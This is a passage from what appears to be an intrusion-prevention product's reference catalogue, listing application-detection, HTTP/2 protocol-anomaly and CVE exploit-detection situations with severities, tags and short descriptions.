Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

HotSchedules

About this situation: Application HotSchedules detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HotSchedules provides Web-based scheduling, forecasting and employee-engagement services. The HotSchedules product portfolio includes our flagship scheduling software the POS-integrated employee scheduling, forecasting and messaging tool that allows you to build your schedule using sales data straight from your POS system.
Back to top

Hotspot-Shield-VPN

About this situation: Hotspot Shield VPN traffic detected
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-1136-5242
Description: Hotspot Shield is a software application developed by AnchorFree, Inc. that allows users to surf the Internet privately by creating a virtual private network.
Back to top

Hotwire

About this situation: Hotwire usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Hotwire offers low prices on airfare, hotel, rental cars, and vacation packages by selling off unsold travel inventory at discounted prices.
Back to top

HoudiniESQ

About this situation: Application HoudiniESQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HoudiniESQ is one integrated suite of tools that streamlines workflow, increases productivity, helps you to provide better service, and helps build your practice. HoudiniESQ natively integrates with Outlook, Word, Excel, and Quickbooks.
Back to top

HouseCall-Pro

About this situation: Application HouseCall-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HouseCall Pro is a mobile app that will put you in control and delight your customers
Back to top

Hover

About this situation: Application Hover detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hover is an Internet domain name registration service.
Back to top

Howardforums

About this situation: HowardForums usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-654-5211
Description: HowardForums is an online discussion forum focusing on smart phones and service providers in the US and Canada. The service is offered using a web based model. The site can be accessed at the URL http://www.howardforums.com/.
Back to top

Howlr

About this situation: Application Howlr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Toasted Snow creates software solutions for advertising agencies, including tools for building a private social network, agency collaboration, agency campaign management, and social media analytics.
Back to top

HP CEEment

About this situation: Endpoint Context Agent based HP CEEment detection
Context: EI Correlation
Severity: 1
Tags: Monitoring, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-991-5242
Description: HP CEEment endpoint application has been detected. HP Customer Experience Enhancement (CEEment) is a reporting tool that HP uses to collect anonymous data.
Back to top

HP Support Assistant

About this situation: Endpoint Context Agent based HP Support Assistant detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: HP Support Assistant endpoint application has been detected. HP Support Assistant monitors the system and other components developed by HP. It also provides ability to apply latest updates and contact the HP technical support.
Back to top

HP Touchpoint Analytics Client

About this situation: Endpoint Context Agent based HP Touchpoint Analytics detection
Context: EI Correlation
Severity: 1
Tags: Monitoring, Endpoint
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Description: HP Touchpoint Analytics Client endpoint application has been detected. It is a reporting tool that HP uses to collect telemetry.
Back to top

HP-Eprint-Center

About this situation: HP ePrint Center usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: HP ePrint Center use cloud resources to provide mobile printing capabilities for specific HP ePrint-enabled printers and MFPs and for other printers using applications that provide network printing.
Back to top

HP-Fortify-On-Demand

About this situation: HP Fortify on Demand usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: This service tests user applications and provides reviews of the results. Source: Wikipedia
Back to top

HP-Helion-Cloud

About this situation: Application HP-Helion-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HP Public Cloud provides on-demand, pay-as-you-go cloud services for computing, storage infrastructure as well as platform services.
Back to top

HR-Connection

About this situation: Application HR-Connection detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HRconnection is a customized client portal and benefit administration solution, provided by insurance brokers for HR administrators and employees.
Back to top

HR-Mantra

About this situation: Application HR-Mantra detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HRMantra manages staffing, induction, HRIS, attendance, leave, payroll, training, appraisals i.e. all such HRMS activities from candidate entry till employee exit.
Back to top

HR-Meter

About this situation: Application HR-Meter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HR-Meter is an international full service Human Resources consultancy firm that offers our world class clients across the globe innovative assessment services with a unique and unprecedented level of customization.
Back to top

HR-Passport

About this situation: Application HR-Passport detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TriNet Passport
Back to top

HR-Performance-Management

About this situation: Application HR-Performance-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: L7's Easy Appraisal allows your managers to tie Organizational and/or Departmental key objectives to individual employee appraisals. This objective process helps stress the importance of team and overall performance while influencing individual performance positively.
Back to top

HRBoss

About this situation: Application HRBoss detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HRBoss - the only all-in-one cloud based analytics and workforce planning platform that takes you from insights to action.
Back to top

HRmarketer

About this situation: Application HRmarketer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HRmarketer is a marketing software and services firm that helps companies reach human resource decision makers.
Back to top

HRMC-Acclaim

About this situation: Application HRMC-Acclaim detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Human Resource Management Center, Inc.
Back to top

HRMS

About this situation: Application HRMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HRMSSoft is a complete human capital management tool which manages the hire to retire process in the cloud, which includes Talent Management,Organization Management, Compensation Management, Benefits Management, Absence Management, Goal Management,payroll management and Performance Management.
Back to top

HRTMS

About this situation: Application HRTMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HRTMS is an HR software company specializing in the automation and management of job descriptions.
Back to top

HSBC

About this situation: HSBC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: HSBC usage detected. HSBC is an international banking corporation.
Back to top

HSEQ-Innovate

About this situation: Application HSEQ-Innovate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HSEQ Innovate is a cloud based solution for compliance and health and safety using Office 365 and Microsoft SharePoint technology and mobile device forms.
Back to top

HSL-Reittiopas

About this situation: HSL Reittiopas service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1086-5242
Description: HSL Reittiopas usage has been detected. Reittiopas provides information about public transport in the region of Helsinki, Finland.
Back to top

HTTP

About this situation: HTTP traffic
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1549-5242
Description: HTTP protocol usage.
Back to top

HTTP-0.9

About this situation: HTTP/0.9 traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-1144-5242
Description: HTTP/0.9 protocol usage.
Back to top

HTTP-Injector

About this situation: HTTP-Injector usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1054-5242
Description: HTTP Injector is a tool used to bypass firewalls by connecting to an SSH/Proxy with a custom header.
Back to top

HTTP-Proxy-Service

About this situation: Proxy service usage
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-628-5211
Description: Proxy services are often used to bypass security devices.
Back to top

HTTP-Soap

About this situation: SOAP procotol content embedded in HTTP traffic.
Context: Application Context
Severity: 1
Tags: Protocols, Basic Internet Services
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Description: SOAP procotol content embedded in HTTP traffic.
Back to top

Http.tunnel

About this situation: HTTP.Tunnel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: The HTTP.Tunnel Client is an application that runs in your system tray acting as a SOCKS server, managing all data transmissions between the computer and the network.This is made possible by sending data through HTTP (port 80). Additionally, HTTP.Tunnel technology is very secure, making it indispensable for both average and business communications
Back to top

HTTP2_Client-Decompression-Error-Incomplete-Data

About this situation: Incomplete compressed HTTP/2 client data
Context: HTTP2
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: The end of the compressed data sent by an HTTP/2 client was not reached after all data was received.
Back to top

HTTP2_Client-Decompression-Error-No-Data

About this situation: Decompression error, no HTTP/2 client data decompressed
Context: HTTP2
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: There was an error when decompressing data sent by an HTTP/2 client and no data could be decompressed. The actual encoding could be different than the encoding indicated by the content-encoding header or the data could have been sent without being encoded at all. The data was fed to file filtering without decompression.
Back to top

HTTP2_Client-Decompression-Trailing-Data

About this situation: Trailing data after compressed HTTP/2 client data
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: An HTTP/2 client sent some trailing data after it completed sending compressed data.
Back to top

HTTP2_Client-Goaway-Error

About this situation: HTTP/2 GOAWAY (error) sent by client
Context: HTTP2
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Description: An HTTP/2 client has sent a GOAWAY frame that indicates that it has detected a serious error in processing HTTP/2 traffic and that it is shutting down the connection.
Back to top

HTTP2_Client-Goaway-Graceful-Shutdown

About this situation: HTTP/2 GOAWAY (graceful shutdown) sent by client
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Description: An HTTP/2 client has sent a GOAWAY frame that indicates initiating a graceful shutdown of the connection.
Back to top

HTTP2_Client-Multipart-Syntax-Error

About this situation: Invalid HTTP/2 client multipart request
Context: HTTP2
Severity: 7
Tags: Protocol Information
First detected in: sgpkg-ips-1782-5242
Last changed: sgpkg-ips-1782-5242
Description: The data sent by an HTTP/2 client could not be parsed as a multipart message although according to the HTTP/2 headers the message is expected to be in the multipart format.
Back to top

HTTP2_DATA-In-Invalid-State

About this situation: HTTP/2 DATA frame in invalid stream state
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 DATA frame is seen when the state of the stream is not as defined in [RFC 7540].
Back to top

HTTP2_DATA-Without-Request

About this situation: HTTP/2 DATA frame without request
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 DATA frame is seen without first seeing a request.
Back to top

HTTP2_Duplicate-END_HEADERS

About this situation: Unexpected duplicate END_HEADERS flag in an HTTP/2 stream
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Description: The END_HEADERS flag typically appears only once in each HTTP/2 stream and optionally again if the stream has trailing header fields. In this stream there is an unexpected duplicate END_HEADERS flag.
Back to top

HTTP2_Duplicate-END_STREAM

About this situation: Unexpected duplicate END_STREAM flag in an HTTP/2 stream
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1760-5242
Last changed: sgpkg-ips-1760-5242
Description: The END_STREAM flag typically appears only once in each HTTP/2 stream. In this stream there is an unexpected duplicate END_STREAM flag.
Back to top

HTTP2_Duplicate-Header

About this situation: Duplicate HTTP/2 header
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1661-5242
Description: An HTTP/2 header appears more than once, even though this kind of header is expected to appear only once.
Back to top

HTTP2_Frame-Type-PING

About this situation: HTTP/2 PING frame detected.
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: A HTTP/2 frame with frame type PING was seen.
Back to top

HTTP2_Frame-Type-PRIORITY

About this situation: HTTP/2 PRIORITY frame detected.
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: A HTTP/2 frame with frame type PRIORITY was seen.
Back to top

HTTP2_Frame-Type-RST_STREAM

About this situation: HTTP/2 RST_STREAM frame detected.
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: A HTTP/2 frame with frame type RST_STREAM was seen.
Back to top

HTTP2_Frame-Type-SETTINGS

About this situation: HTTP/2 SETTINGS frame detected.
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: A HTTP/2 frame with frame type SETTINGS was seen.
Back to top

HTTP2_Frame-Type-WINDOW_UPDATE

About this situation: HTTP/2 WINDOW_UPDATE frame detected.
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: A HTTP/2 frame with frame type WINDOW_UPDATE was seen.
Back to top

HTTP2_FRAME_HEADER-Google-Golang-HTTP2-CONTINUATION-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Google Golang detected
Context: HTTP2 Frame Header
Severity: 7
Tags: Windows, Unix, Linux, Mac OS, Any Hardware, Google Golang, CVE2023, Windows not specific, Unix not specific, Linux not specific, Mac OS not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Google-Golang-HTTP2-CONTINUATION-Denial-Of-Service
Description:
Back to top

HTTP2_HEADERS-In-Invalid-State

About this situation: HTTP/2 HEADERS frame in invalid stream state
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1666-5242
Description: An HTTP/2 HEADERS frame is seen when the state of the stream is not as defined in [RFC 7540].
Back to top

HTTP2_HPACK-Haproxy-HTTP2-HPACK-Out-of-Bound-Write

About this situation: An attempt to exploit a vulnerability in HAProxy detected
Context: HTTP2 HPACK
Severity: 7
Tags: Linux, Any Hardware, HAProxy, CVE2020, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Haproxy-HTTP2-HPACK-Out-of-Bound-Write
Description:
Back to top

HTTP2_Invalid-Character-In-header

About this situation: Invalid chracter in an HTTP/2 header
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1203-5242
Description: An HTTP/2 header contains a character that is not among the valid characters. The valid characters as defined in [RFC7540] chapter 10.3 and [RFC7230] are visible USASCII characters (including space), horizontal tab and characters 0x80-0xff.
Back to top

HTTP2_Invalid-Client-Preface

About this situation: Invalid HTTP/2 client connection preface
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP/2 client connection preface is not as defined in [RFC 7540].
Back to top

HTTP2_Invalid-Compression

About this situation: Invalid HTTP/2 header compression
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: A compressed HTTP/2 header string literal is not represented as defined in [RFC 7541].
Back to top

HTTP2_Invalid-Content-Length

About this situation: Invalid HTTP/2 content-length header
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 content-length header is not a valid non-negative integer.
Back to top

HTTP2_Invalid-Content-Range

About this situation: Invalid HTTP/2 content-range header
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 content-range header contains an invalid content range.
Back to top

HTTP2_Invalid-Dep-Stream-Ref

About this situation: Invalid HTTP/2 dependency stream reference
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP/2 stream referred to as a dependency does not exist.
Back to top

HTTP2_Invalid-Dyn-Table-Size

About this situation: Invalid HTTP/2 dynamic table size
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The size of an HTTP/2 dynamic header table exceeds the size specified in the HEADER_TABLE_SIZE setting.
Back to top

HTTP2_Invalid-Flags

About this situation: Invalid HTTP/2 flags
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The flags in an HTTP/2 frame are not as defined in [RFC 7540].
Back to top

HTTP2_Invalid-Frame-Type

About this situation: Invalid HTTP/2 frame type
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The type of an HTTP/2 frame is not among the ones defined in [RFC 7540].
Back to top

HTTP2_Invalid-GOAWAY-Stream-Ref

About this situation: Invalid HTTP/2 GOAWAY frame stream reference
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP/2 stream referred to in a GOAWAY frame does not exist.
Back to top

HTTP2_Invalid-Header-Index

About this situation: Invalid HTTP/2 header index
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An index in a compressed HTTP/2 header does not refer to any existing dynamic table entry.
Back to top

HTTP2_Invalid-Max-Frame-Size

About this situation: Invalid HTTP/2 maximum frame size setting
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Description: The value of the SETTINGS_MAX_FRAME_SIZE in an HTTP/2 SETTINGS frame is not within the allowed range as defined in [RFC 7540].
Back to top

HTTP2_Invalid-Server-Preface

About this situation: Invalid HTTP/2 server connection preface
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1203-5242
Description: The HTTP/2 server must send a SETTINGS frame as the connection preface before sending any other frames in the connection as defined in [RFC 7540].
Back to top

HTTP2_Invalid-Status

About this situation: Invalid HTTP/2 status code header
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 header contains an invalid status code.
Back to top

HTTP2_Invalid-Stream-ID-Parity

About this situation: Invalid HTTP/2 stream identifier parity
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: A stream identifier parity is not as defined in [RFC 7540].
Back to top

HTTP2_Max-Frame-Size-Exceeded

About this situation: HTTP/2 maximum frame size exceeded
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Description: The size of an HTTP/2 frame exceeds the current MAX_FRAME_SIZE setting in the connection.
Back to top

HTTP2_Missing-Path

About this situation: Missing HTTP/2 :path header
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP/2 :path header is missing or is invalid.
Back to top

HTTP2_Missing-Scheme

About this situation: Missing HTTP/2 :scheme header
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP/2 :scheme header is missing or is invalid.
Back to top

HTTP2_Missing-Status-Code

About this situation: HTTP/2 response does not have a status code
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 response does not have a status code.
Back to top

HTTP2_Promised-Stream-Exists

About this situation: HTTP/2 push promise stream already exists
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP/2 stream referred to as the promised stream in a PUSH_PROMISE frame already exists.
Back to top

HTTP2_Protocol-Error

About this situation: HTTP/2 protocol error
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Description: The traffic that is expected to be as defined in [RFC 7540] has an error at the protocol level.
Back to top

HTTP2_Protocol-Identified

About this situation: HTTP/2 protocol identified
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Description: The traffic is identified as HTTP/2 as defined in [RFC 7540].
Back to top

HTTP2_Server-Decompression-Error-Incomplete-Data

About this situation: Incomplete compressed HTTP/2 server data
Context: HTTP2
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: The end of the compressed data sent by an HTTP/2 server was not reached after all data was received.
Back to top

HTTP2_Server-Decompression-Error-No-Data

About this situation: Decompression error, no HTTP/2 server data decompressed
Context: HTTP2
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: There was an error when decompressing data sent by an HTTP/2 server and no data could be decompressed. The actual encoding could be different than the encoding indicated by the content-encoding header or the data could have been sent without being encoded at all. The data was fed to file filtering without decompression.
Back to top

HTTP2_Server-Decompression-Trailing-Data

About this situation: Trailing data after compressed HTTP/2 server data
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: An HTTP/2 server sent some trailing data after it completed sending compressed data.
Back to top

HTTP2_Server-Goaway-Error

About this situation: HTTP/2 GOAWAY (error) sent by server
Context: HTTP2
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Description: An HTTP/2 server has sent a GOAWAY frame that indicates that it has detected a serious error in processing HTTP/2 traffic and that it is shutting down the connection.
Back to top

HTTP2_Server-Goaway-Graceful-Shutdown

About this situation: HTTP/2 GOAWAY (graceful shutdown) sent by server
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Description: An HTTP/2 server has sent a GOAWAY frame that indicates initiating a graceful shutdown of the connection.
Back to top

HTTP2_Server-Multipart-Syntax-Error

About this situation: Invalid HTTP/2 server multipart request
Context: HTTP2
Severity: 7
Tags: Protocol Information
First detected in: sgpkg-ips-1782-5242
Last changed: sgpkg-ips-1782-5242
Description: The data sent by an HTTP/2 server could not be parsed as a multipart message although according to the HTTP/2 headers the message is expected to be in the multipart format.
Back to top

HTTP2_SETTINGS-Ack-Not_empty

About this situation: HTTP/2 SETTINGS frame with acknowledgment not empty
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 SETTINGS frame with the ACK flag set is not empty as required by [RFC 7540].
Back to top

HTTP2_SETTINGS-Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache HTTP Server detected
Context: HTTP2 SETTINGS
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, CVE2023, Any Operating System not specific, Apache not specific, Potential Denial of Service
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Vulnerability: Apache-Httpd-Mod_HTTP2-H2_Session_process-Denial-Of-Service
Description:
Back to top

HTTP2_SETTINGS-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Varnish Cache detected
Context: HTTP2 SETTINGS
Severity: 2
Tags: Unix, Linux, Any Hardware, Varnish Cache, CVE2024, Unix not specific, Linux not specific, Potential Denial of Service
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1762-5242
Vulnerability: Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
Description:
Back to top

HTTP2_Too-Long-Padding

About this situation: Too long HTTP/2 padding
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The pad length that is specified at the beginning of an HTTP/2 frame causes the padding to not fit in the frame.
Back to top

HTTP2_Too-Short-Payload

About this situation: HTTP/2 frame has too short payload
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: The length of the payload of an HTTP/2 frame is too small to contain some mandatory data that is defined in [RFC 7540].
Back to top

HTTP2_Unexpected-Content-Length

About this situation: Unexpected HTTP/2 content-length header
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 content-length header is seen after data has already been seen.
Back to top

HTTP2_Unexpected-SETTINGS-Ack

About this situation: HTTP/2 SETTINGS frame acknowledged, even though not sent
Context: HTTP2
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1531-5242
Description: An HTTP/2 SETTINGS frame has the ACK flag set, even though the other peer has not sent settings.
Back to top

HTTP2_Unknown-Setting-ID

About this situation: Unknown HTTP/2 setting identifier
Context: HTTP2
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1194-5242
Description: The identifier in an HTTP/2 SETTINGS frame is not among the ones defined in [RFC 7540].
Back to top

HTTP8080_Apache-SSL-Proxy-Vulnerability

About this situation: Detects attacks exploiting Proxy vulnerability in apache
Context: HTTP Proxy Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: Apache-Mod-Ssl-Log-Function-Format-String
Description:
Back to top

HTTP8080_CS-Squid-Authentication-Header-DoS

About this situation: Detects HTTP requests that exploit Squid Web Proxy authentication header vulnerability
Context: HTTP Proxy Client Stream
Severity: 2
Tags: Windows, Any Hardware, Squid, CVE2005, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-252-3038
Vulnerability: HTTP-Squid-Authentication-Header-DoS
Description:
Back to top

HTTP8080_CS-Squid-HTTP-Version-Number-Parsing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: HTTP Proxy Client Stream
